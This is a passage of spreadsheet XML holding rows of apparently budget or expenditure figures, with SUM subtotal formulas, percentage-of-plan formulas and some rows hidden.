      </c>
      <c r="D1062" s="100">
        <f>SUM(D1063:D1064)</f>
        <v>0</v>
      </c>
      <c r="E1062" s="173">
        <f>SUM(E1063:E1064)</f>
        <v>0</v>
      </c>
      <c r="F1062" s="174"/>
      <c r="G1062" s="172"/>
    </row>
    <row r="1063" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1063" s="128" t="s">
        <v>1176</v>
      </c>
      <c r="B1063" s="100"/>
      <c r="C1063" s="100"/>
      <c r="D1063" s="100">
        <v>0</v>
      </c>
      <c r="E1063" s="173"/>
      <c r="F1063" s="174"/>
      <c r="G1063" s="172"/>
    </row>
    <row r="1064" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1064" s="128" t="s">
        <v>1177</v>
      </c>
      <c r="B1064" s="100"/>
      <c r="C1064" s="100"/>
      <c r="D1064" s="100">
        <v>0</v>
      </c>
      <c r="E1064" s="173"/>
      <c r="F1064" s="174"/>
      <c r="G1064" s="172"/>
    </row>
    <row r="1065" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1065" s="128" t="s">
        <v>1178</v>
      </c>
      <c r="B1065" s="100">
        <f>SUM(B1066,B1073,B1079)</f>
        <v>0</v>
      </c>
      <c r="C1065" s="100">
        <f>SUM(C1066,C1073,C1079)</f>
        <v>0</v>
      </c>
      <c r="D1065" s="100">
        <f>SUM(D1066,D1073,D1079)</f>
        <v>0</v>
      </c>
      <c r="E1065" s="173">
        <f>SUM(E1066,E1073,E1079)</f>
        <v>0</v>
      </c>
      <c r="F1065" s="174"/>
      <c r="G1065" s="172"/>
    </row>
    <row r="1066" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1066" s="128" t="s">
        <v>1179</v>
      </c>
      <c r="B1066" s="100">
        <f>SUM(B1067:B1072)</f>
        <v>0</v>
      </c>
      <c r="C1066" s="100">
        <f>SUM(C1067:C1072)</f>
        <v>0</v>
      </c>
      <c r="D1066" s="100">
        <f>SUM(D1067:D1072)</f>
        <v>0</v>
      </c>
      <c r="E1066" s="173">
        <f>SUM(E1067:E1072)</f>
        <v>0</v>
      </c>
      <c r="F1066" s="174"/>
      <c r="G1066" s="172"/>
    </row>
    <row r="1067" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1067" s="128" t="s">
        <v>372</v>
      </c>
      <c r="B1067" s="100"/>
      <c r="C1067" s="100"/>
      <c r="D1067" s="100">
        <v>0</v>
      </c>
      <c r="E1067" s="173"/>
      <c r="F1067" s="174"/>
      <c r="G1067" s="172"/>
    </row>
    <row r="1068" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1068" s="128" t="s">
        <v>373</v>
      </c>
      <c r="B1068" s="100"/>
      <c r="C1068" s="100"/>
      <c r="D1068" s="100">
        <v>0</v>
      </c>
      <c r="E1068" s="173"/>
      <c r="F1068" s="174"/>
      <c r="G1068" s="172"/>
    </row>
    <row r="1069" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1069" s="128" t="s">
        <v>374</v>
      </c>
      <c r="B1069" s="100"/>
      <c r="C1069" s="100"/>
      <c r="D1069" s="100">
        <v>0</v>
      </c>
      <c r="E1069" s="173"/>
      <c r="F1069" s="174"/>
      <c r="G1069" s="172"/>
    </row>
    <row r="1070" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1070" s="128" t="s">
        <v>1180</v>
      </c>
      <c r="B1070" s="100"/>
      <c r="C1070" s="100"/>
      <c r="D1070" s="100">
        <v>0</v>
      </c>
      <c r="E1070" s="173"/>
      <c r="F1070" s="174"/>
      <c r="G1070" s="172"/>
    </row>
    <row r="1071" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1071" s="128" t="s">
        <v>381</v>
      </c>
      <c r="B1071" s="100"/>
      <c r="C1071" s="100"/>
      <c r="D1071" s="100">
        <v>0</v>
      </c>
      <c r="E1071" s="173"/>
      <c r="F1071" s="174"/>
      <c r="G1071" s="172"/>
    </row>
    <row r="1072" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1072" s="128" t="s">
        <v>1181</v>
      </c>
      <c r="B1072" s="100"/>
      <c r="C1072" s="100"/>
      <c r="D1072" s="100">
        <v>0</v>
      </c>
      <c r="E1072" s="173"/>
      <c r="F1072" s="174"/>
      <c r="G1072" s="172"/>
    </row>
    <row r="1073" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1073" s="128" t="s">
        <v>1182</v>
      </c>
      <c r="B1073" s="100">
        <f>SUM(B1074:B1078)</f>
        <v>0</v>
      </c>
      <c r="C1073" s="100">
        <f>SUM(C1074:C1078)</f>
        <v>0</v>
      </c>
      <c r="D1073" s="100">
        <f>SUM(D1074:D1078)</f>
        <v>0</v>
      </c>
      <c r="E1073" s="173">
        <f>SUM(E1074:E1078)</f>
        <v>0</v>
      </c>
      <c r="F1073" s="174"/>
      <c r="G1073" s="172"/>
    </row>
    <row r="1074" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1074" s="128" t="s">
        <v>1183</v>
      </c>
      <c r="B1074" s="100"/>
      <c r="C1074" s="100"/>
      <c r="D1074" s="100">
        <v>0</v>
      </c>
      <c r="E1074" s="173"/>
      <c r="F1074" s="174"/>
      <c r="G1074" s="172"/>
    </row>
    <row r="1075" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1075" s="128" t="s">
        <v>1184</v>
      </c>
      <c r="B1075" s="100"/>
      <c r="C1075" s="100"/>
      <c r="D1075" s="100">
        <v>0</v>
      </c>
      <c r="E1075" s="173"/>
      <c r="F1075" s="174"/>
      <c r="G1075" s="172"/>
    </row>
    <row r="1076" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1076" s="128" t="s">
        <v>1185</v>
      </c>
      <c r="B1076" s="100"/>
      <c r="C1076" s="100"/>
      <c r="D1076" s="100">
        <v>0</v>
      </c>
      <c r="E1076" s="173"/>
      <c r="F1076" s="174"/>
      <c r="G1076" s="172"/>
    </row>
    <row r="1077" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1077" s="128" t="s">
        <v>1186</v>
      </c>
      <c r="B1077" s="100"/>
      <c r="C1077" s="100"/>
      <c r="D1077" s="100">
        <v>0</v>
      </c>
      <c r="E1077" s="173"/>
      <c r="F1077" s="174"/>
      <c r="G1077" s="172"/>
    </row>
    <row r="1078" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1078" s="128" t="s">
        <v>1187</v>
      </c>
      <c r="B1078" s="100"/>
      <c r="C1078" s="100"/>
      <c r="D1078" s="100">
        <v>0</v>
      </c>
      <c r="E1078" s="173"/>
      <c r="F1078" s="174"/>
      <c r="G1078" s="172"/>
    </row>
    <row r="1079" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1079" s="128" t="s">
        <v>1188</v>
      </c>
      <c r="B1079" s="100"/>
      <c r="C1079" s="100"/>
      <c r="D1079" s="100">
        <v>0</v>
      </c>
      <c r="E1079" s="173"/>
      <c r="F1079" s="174"/>
      <c r="G1079" s="172"/>
    </row>
    <row r="1080" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1080" s="128" t="s">
        <v>1189</v>
      </c>
      <c r="B1080" s="100">
        <f>SUM(B1081:B1089)</f>
        <v>0</v>
      </c>
      <c r="C1080" s="100">
        <f>SUM(C1081:C1089)</f>
        <v>0</v>
      </c>
      <c r="D1080" s="100">
        <v>0</v>
      </c>
      <c r="E1080" s="173">
        <f>SUM(E1081:E1089)</f>
        <v>0</v>
      </c>
      <c r="F1080" s="174"/>
      <c r="G1080" s="172"/>
    </row>
    <row r="1081" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1081" s="128" t="s">
        <v>1190</v>
      </c>
      <c r="B1081" s="100"/>
      <c r="C1081" s="100"/>
      <c r="D1081" s="100">
        <v>0</v>
      </c>
      <c r="E1081" s="173"/>
      <c r="F1081" s="174"/>
      <c r="G1081" s="172"/>
    </row>
    <row r="1082" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1082" s="128" t="s">
        <v>1191</v>
      </c>
      <c r="B1082" s="100"/>
      <c r="C1082" s="100"/>
      <c r="D1082" s="100">
        <v>0</v>
      </c>
      <c r="E1082" s="173"/>
      <c r="F1082" s="174"/>
      <c r="G1082" s="172"/>
    </row>
    <row r="1083" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1083" s="128" t="s">
        <v>1192</v>
      </c>
      <c r="B1083" s="100"/>
      <c r="C1083" s="100"/>
      <c r="D1083" s="100">
        <v>0</v>
      </c>
      <c r="E1083" s="173"/>
      <c r="F1083" s="174"/>
      <c r="G1083" s="172"/>
    </row>
    <row r="1084" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1084" s="128" t="s">
        <v>1193</v>
      </c>
      <c r="B1084" s="100"/>
      <c r="C1084" s="100"/>
      <c r="D1084" s="100">
        <v>0</v>
      </c>
      <c r="E1084" s="173"/>
      <c r="F1084" s="174"/>
      <c r="G1084" s="172"/>
    </row>
    <row r="1085" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1085" s="128" t="s">
        <v>1194</v>
      </c>
      <c r="B1085" s="100"/>
      <c r="C1085" s="100"/>
      <c r="D1085" s="100">
        <v>0</v>
      </c>
      <c r="E1085" s="173"/>
      <c r="F1085" s="174"/>
      <c r="G1085" s="172"/>
    </row>
    <row r="1086" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1086" s="128" t="s">
        <v>1195</v>
      </c>
      <c r="B1086" s="100"/>
      <c r="C1086" s="100"/>
      <c r="D1086" s="100">
        <v>0</v>
      </c>
      <c r="E1086" s="173"/>
      <c r="F1086" s="174"/>
      <c r="G1086" s="172"/>
    </row>
    <row r="1087" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1087" s="128" t="s">
        <v>1196</v>
      </c>
      <c r="B1087" s="100"/>
      <c r="C1087" s="100"/>
      <c r="D1087" s="100">
        <v>0</v>
      </c>
      <c r="E1087" s="173"/>
      <c r="F1087" s="174"/>
      <c r="G1087" s="172"/>
    </row>
    <row r="1088" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1088" s="128" t="s">
        <v>1197</v>
      </c>
      <c r="B1088" s="100"/>
      <c r="C1088" s="100"/>
      <c r="D1088" s="100">
        <v>0</v>
      </c>
      <c r="E1088" s="173"/>
      <c r="F1088" s="174"/>
      <c r="G1088" s="172"/>
    </row>
    <row r="1089" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1089" s="128" t="s">
        <v>1198</v>
      </c>
      <c r="B1089" s="100"/>
      <c r="C1089" s="100"/>
      <c r="D1089" s="100">
        <v>0</v>
      </c>
      <c r="E1089" s="173"/>
      <c r="F1089" s="174"/>
      <c r="G1089" s="172"/>
    </row>
    <row r="1090" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1090" s="128" t="s">
        <v>1199</v>
      </c>
      <c r="B1090" s="173">
        <f>SUM(B1091,B1118,B1133)</f>
        <v>3772</v>
      </c>
      <c r="C1090" s="173">
        <f>SUM(C1091,C1118,C1133)</f>
        <v>2564</v>
      </c>
      <c r="D1090" s="173">
        <f>SUM(D1091,D1118,D1133)</f>
        <v>3648</v>
      </c>
      <c r="E1090" s="173">
        <f>SUM(E1091,E1118,E1133)</f>
        <v>2501</v>
      </c>
      <c r="F1090" s="174">
        <f aca="true" t="shared" si="62" ref="F1090:F1092">E1090/C1090*100</f>
        <v>97.54290171606864</v>
      </c>
      <c r="G1090" s="172"/>
    </row>
    <row r="1091" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1091" s="128" t="s">
        <v>1200</v>
      </c>
      <c r="B1091" s="100">
        <f>SUM(B1092:B1117)</f>
        <v>3348</v>
      </c>
      <c r="C1091" s="100">
        <f>SUM(C1092:C1117)</f>
        <v>2140</v>
      </c>
      <c r="D1091" s="100">
        <f>SUM(D1092:D1117)</f>
        <v>3213</v>
      </c>
      <c r="E1091" s="173">
        <f>SUM(E1092:E1117)</f>
        <v>2066</v>
      </c>
      <c r="F1091" s="174">
        <f t="shared" si="62"/>
        <v>96.54205607476636</v>
      </c>
      <c r="G1091" s="172"/>
    </row>
    <row r="1092" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1092" s="128" t="s">
        <v>372</v>
      </c>
      <c r="B1092" s="100">
        <v>2140</v>
      </c>
      <c r="C1092" s="100">
        <v>2140</v>
      </c>
      <c r="D1092" s="100">
        <v>1607</v>
      </c>
      <c r="E1092" s="173">
        <v>1607</v>
      </c>
      <c r="F1092" s="174">
        <f t="shared" si="62"/>
        <v>75.09345794392523</v>
      </c>
      <c r="G1092" s="172"/>
    </row>
    <row r="1093" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1093" s="128" t="s">
        <v>373</v>
      </c>
      <c r="B1093" s="100">
        <v>0</v>
      </c>
      <c r="C1093" s="100"/>
      <c r="D1093" s="100">
        <v>0</v>
      </c>
      <c r="E1093" s="173"/>
      <c r="F1093" s="174"/>
      <c r="G1093" s="172"/>
    </row>
    <row r="1094" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1094" s="128" t="s">
        <v>374</v>
      </c>
      <c r="B1094" s="100">
        <v>0</v>
      </c>
      <c r="C1094" s="100"/>
      <c r="D1094" s="100">
        <v>0</v>
      </c>
      <c r="E1094" s="173"/>
      <c r="F1094" s="174"/>
      <c r="G1094" s="172"/>
    </row>
    <row r="1095" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1095" s="128" t="s">
        <v>1201</v>
      </c>
      <c r="B1095" s="100">
        <v>0</v>
      </c>
      <c r="C1095" s="100"/>
      <c r="D1095" s="100">
        <v>0</v>
      </c>
      <c r="E1095" s="173"/>
      <c r="F1095" s="174"/>
      <c r="G1095" s="172"/>
    </row>
    <row r="1096" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1096" s="128" t="s">
        <v>1202</v>
      </c>
      <c r="B1096" s="100">
        <v>0</v>
      </c>
      <c r="C1096" s="100"/>
      <c r="D1096" s="100">
        <v>0</v>
      </c>
      <c r="E1096" s="173"/>
      <c r="F1096" s="174"/>
      <c r="G1096" s="172"/>
    </row>
    <row r="1097" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1097" s="128" t="s">
        <v>1203</v>
      </c>
      <c r="B1097" s="100">
        <v>0</v>
      </c>
      <c r="C1097" s="100"/>
      <c r="D1097" s="100">
        <v>0</v>
      </c>
      <c r="E1097" s="173"/>
      <c r="F1097" s="174"/>
      <c r="G1097" s="172"/>
    </row>
    <row r="1098" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1098" s="128" t="s">
        <v>1204</v>
      </c>
      <c r="B1098" s="100">
        <v>0</v>
      </c>
      <c r="C1098" s="100"/>
      <c r="D1098" s="100">
        <v>0</v>
      </c>
      <c r="E1098" s="173"/>
      <c r="F1098" s="174"/>
      <c r="G1098" s="172"/>
    </row>
    <row r="1099" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1099" s="128" t="s">
        <v>1205</v>
      </c>
      <c r="B1099" s="100">
        <v>0</v>
      </c>
      <c r="C1099" s="100"/>
      <c r="D1099" s="100">
        <v>0</v>
      </c>
      <c r="E1099" s="173"/>
      <c r="F1099" s="174"/>
      <c r="G1099" s="172"/>
    </row>
    <row r="1100" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1100" s="128" t="s">
        <v>1206</v>
      </c>
      <c r="B1100" s="100">
        <v>0</v>
      </c>
      <c r="C1100" s="100"/>
      <c r="D1100" s="100">
        <v>0</v>
      </c>
      <c r="E1100" s="173"/>
      <c r="F1100" s="174"/>
      <c r="G1100" s="172"/>
    </row>
    <row r="1101" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1101" s="128" t="s">
        <v>1207</v>
      </c>
      <c r="B1101" s="100">
        <v>0</v>
      </c>
      <c r="C1101" s="100"/>
      <c r="D1101" s="100">
        <v>0</v>
      </c>
      <c r="E1101" s="173"/>
      <c r="F1101" s="174"/>
      <c r="G1101" s="172"/>
    </row>
    <row r="1102" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1102" s="128" t="s">
        <v>1208</v>
      </c>
      <c r="B1102" s="100">
        <v>0</v>
      </c>
      <c r="C1102" s="100"/>
      <c r="D1102" s="100">
        <v>0</v>
      </c>
      <c r="E1102" s="173"/>
      <c r="F1102" s="174"/>
      <c r="G1102" s="172"/>
    </row>
    <row r="1103" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1103" s="128" t="s">
        <v>1209</v>
      </c>
      <c r="B1103" s="100">
        <v>0</v>
      </c>
      <c r="C1103" s="100"/>
      <c r="D1103" s="100">
        <v>0</v>
      </c>
      <c r="E1103" s="173"/>
      <c r="F1103" s="174"/>
      <c r="G1103" s="172"/>
    </row>
    <row r="1104" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1104" s="128" t="s">
        <v>1210</v>
      </c>
      <c r="B1104" s="100">
        <v>0</v>
      </c>
      <c r="C1104" s="100"/>
      <c r="D1104" s="100">
        <v>0</v>
      </c>
      <c r="E1104" s="173"/>
      <c r="F1104" s="174"/>
      <c r="G1104" s="172"/>
    </row>
    <row r="1105" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1105" s="128" t="s">
        <v>1211</v>
      </c>
      <c r="B1105" s="100">
        <v>0</v>
      </c>
      <c r="C1105" s="100"/>
      <c r="D1105" s="100">
        <v>0</v>
      </c>
      <c r="E1105" s="173"/>
      <c r="F1105" s="174"/>
      <c r="G1105" s="172"/>
    </row>
    <row r="1106" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1106" s="128" t="s">
        <v>1212</v>
      </c>
      <c r="B1106" s="100"/>
      <c r="C1106" s="100"/>
      <c r="D1106" s="100">
        <v>0</v>
      </c>
      <c r="E1106" s="173"/>
      <c r="F1106" s="174"/>
      <c r="G1106" s="172"/>
    </row>
    <row r="1107" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1107" s="128" t="s">
        <v>1213</v>
      </c>
      <c r="B1107" s="100"/>
      <c r="C1107" s="100"/>
      <c r="D1107" s="100">
        <v>0</v>
      </c>
      <c r="E1107" s="173"/>
      <c r="F1107" s="174"/>
      <c r="G1107" s="172"/>
    </row>
    <row r="1108" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1108" s="128" t="s">
        <v>1214</v>
      </c>
      <c r="B1108" s="100"/>
      <c r="C1108" s="100"/>
      <c r="D1108" s="100">
        <v>0</v>
      </c>
      <c r="E1108" s="173"/>
      <c r="F1108" s="174"/>
      <c r="G1108" s="172"/>
    </row>
    <row r="1109" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1109" s="128" t="s">
        <v>1215</v>
      </c>
      <c r="B1109" s="100"/>
      <c r="C1109" s="100"/>
      <c r="D1109" s="100">
        <v>0</v>
      </c>
      <c r="E1109" s="173"/>
      <c r="F1109" s="174"/>
      <c r="G1109" s="172"/>
    </row>
    <row r="1110" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1110" s="128" t="s">
        <v>1216</v>
      </c>
      <c r="B1110" s="100"/>
      <c r="C1110" s="100"/>
      <c r="D1110" s="100">
        <v>0</v>
      </c>
      <c r="E1110" s="173"/>
      <c r="F1110" s="174"/>
      <c r="G1110" s="172"/>
    </row>
    <row r="1111" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1111" s="128" t="s">
        <v>1217</v>
      </c>
      <c r="B1111" s="100"/>
      <c r="C1111" s="100"/>
      <c r="D1111" s="100">
        <v>0</v>
      </c>
      <c r="E1111" s="173"/>
      <c r="F1111" s="174"/>
      <c r="G1111" s="172"/>
    </row>
    <row r="1112" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1112" s="128" t="s">
        <v>1218</v>
      </c>
      <c r="B1112" s="100"/>
      <c r="C1112" s="100"/>
      <c r="D1112" s="100">
        <v>0</v>
      </c>
      <c r="E1112" s="173"/>
      <c r="F1112" s="174"/>
      <c r="G1112" s="172"/>
    </row>
    <row r="1113" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1113" s="128" t="s">
        <v>1219</v>
      </c>
      <c r="B1113" s="100"/>
      <c r="C1113" s="100"/>
      <c r="D1113" s="100">
        <v>0</v>
      </c>
      <c r="E1113" s="173"/>
      <c r="F1113" s="174"/>
      <c r="G1113" s="172"/>
    </row>
    <row r="1114" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1114" s="128" t="s">
        <v>1220</v>
      </c>
      <c r="B1114" s="100"/>
      <c r="C1114" s="100"/>
      <c r="D1114" s="100">
        <v>0</v>
      </c>
      <c r="E1114" s="173"/>
      <c r="F1114" s="174"/>
      <c r="G1114" s="172"/>
    </row>
    <row r="1115" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1115" s="128" t="s">
        <v>1221</v>
      </c>
      <c r="B1115" s="100"/>
      <c r="C1115" s="100"/>
      <c r="D1115" s="100">
        <v>0</v>
      </c>
      <c r="E1115" s="173"/>
      <c r="F1115" s="174"/>
      <c r="G1115" s="172"/>
    </row>
    <row r="1116" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1116" s="128" t="s">
        <v>381</v>
      </c>
      <c r="B1116" s="100">
        <v>0</v>
      </c>
      <c r="C1116" s="100"/>
      <c r="D1116" s="100">
        <v>0</v>
      </c>
      <c r="E1116" s="173"/>
      <c r="F1116" s="174"/>
      <c r="G1116" s="172"/>
    </row>
    <row r="1117" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1117" s="128" t="s">
        <v>1222</v>
      </c>
      <c r="B1117" s="100">
        <v>1208</v>
      </c>
      <c r="C1117" s="100"/>
      <c r="D1117" s="100">
        <v>1606</v>
      </c>
      <c r="E1117" s="173">
        <v>459</v>
      </c>
      <c r="F1117" s="174"/>
      <c r="G1117" s="172"/>
    </row>
    <row r="1118" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1118" s="128" t="s">
        <v>1223</v>
      </c>
      <c r="B1118" s="100">
        <f>SUM(B1119:B1132)</f>
        <v>424</v>
      </c>
      <c r="C1118" s="100">
        <f>SUM(C1119:C1132)</f>
        <v>424</v>
      </c>
      <c r="D1118" s="100">
        <f>SUM(D1119:D1132)</f>
        <v>435</v>
      </c>
      <c r="E1118" s="173">
        <f>SUM(E1119:E1132)</f>
        <v>435</v>
      </c>
      <c r="F1118" s="174">
        <f>E1118/C1118*100</f>
        <v>102.59433962264151</v>
      </c>
      <c r="G1118" s="172"/>
    </row>
    <row r="1119" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1119" s="128" t="s">
        <v>372</v>
      </c>
      <c r="B1119" s="100">
        <v>0</v>
      </c>
      <c r="C1119" s="100"/>
      <c r="D1119" s="100">
        <v>0</v>
      </c>
      <c r="E1119" s="173"/>
      <c r="F1119" s="174"/>
      <c r="G1119" s="172"/>
    </row>
    <row r="1120" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1120" s="128" t="s">
        <v>373</v>
      </c>
      <c r="B1120" s="100">
        <v>0</v>
      </c>
      <c r="C1120" s="100"/>
      <c r="D1120" s="100">
        <v>0</v>
      </c>
      <c r="E1120" s="173"/>
      <c r="F1120" s="174"/>
      <c r="G1120" s="172"/>
    </row>
    <row r="1121" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1121" s="128" t="s">
        <v>374</v>
      </c>
      <c r="B1121" s="100">
        <v>0</v>
      </c>
      <c r="C1121" s="100"/>
      <c r="D1121" s="100">
        <v>0</v>
      </c>
      <c r="E1121" s="173"/>
      <c r="F1121" s="174"/>
      <c r="G1121" s="172"/>
    </row>
    <row r="1122" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1122" s="128" t="s">
        <v>1224</v>
      </c>
      <c r="B1122" s="100">
        <v>244</v>
      </c>
      <c r="C1122" s="100">
        <v>244</v>
      </c>
      <c r="D1122" s="100">
        <v>255</v>
      </c>
      <c r="E1122" s="173">
        <v>255</v>
      </c>
      <c r="F1122" s="174">
        <f>E1122/C1122*100</f>
        <v>104.50819672131149</v>
      </c>
      <c r="G1122" s="172"/>
    </row>
    <row r="1123" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1123" s="128" t="s">
        <v>1225</v>
      </c>
      <c r="B1123" s="100">
        <v>0</v>
      </c>
      <c r="C1123" s="100"/>
      <c r="D1123" s="100">
        <v>0</v>
      </c>
      <c r="E1123" s="173"/>
      <c r="F1123" s="174"/>
      <c r="G1123" s="172"/>
    </row>
    <row r="1124" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1124" s="128" t="s">
        <v>1226</v>
      </c>
      <c r="B1124" s="100">
        <v>0</v>
      </c>
      <c r="C1124" s="100"/>
      <c r="D1124" s="100">
        <v>30</v>
      </c>
      <c r="E1124" s="173">
        <v>30</v>
      </c>
      <c r="F1124" s="174"/>
      <c r="G1124" s="172"/>
    </row>
    <row r="1125" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1125" s="128" t="s">
        <v>1227</v>
      </c>
      <c r="B1125" s="100">
        <v>0</v>
      </c>
      <c r="C1125" s="100"/>
      <c r="D1125" s="100">
        <v>0</v>
      </c>
      <c r="E1125" s="173"/>
      <c r="F1125" s="174"/>
      <c r="G1125" s="172"/>
    </row>
    <row r="1126" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1126" s="128" t="s">
        <v>1228</v>
      </c>
      <c r="B1126" s="100">
        <v>180</v>
      </c>
      <c r="C1126" s="100">
        <v>180</v>
      </c>
      <c r="D1126" s="100">
        <v>150</v>
      </c>
      <c r="E1126" s="173">
        <v>150</v>
      </c>
      <c r="F1126" s="174">
        <f>E1126/C1126*100</f>
        <v>83.33333333333334</v>
      </c>
      <c r="G1126" s="172"/>
    </row>
    <row r="1127" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1127" s="128" t="s">
        <v>1229</v>
      </c>
      <c r="B1127" s="100">
        <v>0</v>
      </c>
      <c r="C1127" s="100"/>
      <c r="D1127" s="100">
        <v>0</v>
      </c>
      <c r="E1127" s="173"/>
      <c r="F1127" s="174"/>
      <c r="G1127" s="172"/>
    </row>
    <row r="1128" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1128" s="128" t="s">
        <v>1230</v>
      </c>
      <c r="B1128" s="100">
        <v>0</v>
      </c>
      <c r="C1128" s="100"/>
      <c r="D1128" s="100">
        <v>0</v>
      </c>
      <c r="E1128" s="173"/>
      <c r="F1128" s="174"/>
      <c r="G1128" s="172"/>
    </row>
    <row r="1129" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1129" s="128" t="s">
        <v>1231</v>
      </c>
      <c r="B1129" s="100">
        <v>0</v>
      </c>
      <c r="C1129" s="100"/>
      <c r="D1129" s="100">
        <v>0</v>
      </c>
      <c r="E1129" s="173"/>
      <c r="F1129" s="174"/>
      <c r="G1129" s="172"/>
    </row>
    <row r="1130" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1130" s="128" t="s">
        <v>1232</v>
      </c>
      <c r="B1130" s="100">
        <v>0</v>
      </c>
      <c r="C1130" s="100"/>
      <c r="D1130" s="100">
        <v>0</v>
      </c>
      <c r="E1130" s="173"/>
      <c r="F1130" s="174"/>
      <c r="G1130" s="172"/>
    </row>
    <row r="1131" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1131" s="128" t="s">
        <v>1233</v>
      </c>
      <c r="B1131" s="100">
        <v>0</v>
      </c>
      <c r="C1131" s="100"/>
      <c r="D1131" s="100">
        <v>0</v>
      </c>
      <c r="E1131" s="173"/>
      <c r="F1131" s="174"/>
      <c r="G1131" s="172"/>
    </row>
    <row r="1132" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1132" s="128" t="s">
        <v>1234</v>
      </c>
      <c r="B1132" s="100">
        <v>0</v>
      </c>
      <c r="C1132" s="100"/>
      <c r="D1132" s="100">
        <v>0</v>
      </c>
      <c r="E1132" s="173"/>
      <c r="F1132" s="174"/>
      <c r="G1132" s="172"/>
    </row>
    <row r="1133" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1133" s="128" t="s">
        <v>1235</v>
      </c>
      <c r="B1133" s="100"/>
      <c r="C1133" s="100"/>
      <c r="D1133" s="100">
        <v>0</v>
      </c>
      <c r="E1133" s="173"/>
      <c r="F1133" s="174"/>
      <c r="G1133" s="172"/>
    </row>
    <row r="1134" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1134" s="128" t="s">
        <v>1236</v>
      </c>
      <c r="B1134" s="100">
        <f>SUM(B1135,B1146,B1150)</f>
        <v>19448</v>
      </c>
      <c r="C1134" s="100">
        <f>SUM(C1135,C1146,C1150)</f>
        <v>11299</v>
      </c>
      <c r="D1134" s="100">
        <f>SUM(D1135,D1146,D1150)</f>
        <v>19146</v>
      </c>
      <c r="E1134" s="173">
        <f>SUM(E1135,E1146,E1150)</f>
        <v>11344</v>
      </c>
      <c r="F1134" s="174">
        <f>E1134/C1134*100</f>
        <v>100.39826533321532</v>
      </c>
      <c r="G1134" s="172"/>
    </row>
    <row r="1135" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1135" s="128" t="s">
        <v>1237</v>
      </c>
      <c r="B1135" s="100">
        <f>SUM(B1136:B1145)</f>
        <v>8275</v>
      </c>
      <c r="C1135" s="100">
        <f>SUM(C1136:C1145)</f>
        <v>126</v>
      </c>
      <c r="D1135" s="100">
        <f>SUM(D1136:D1145)</f>
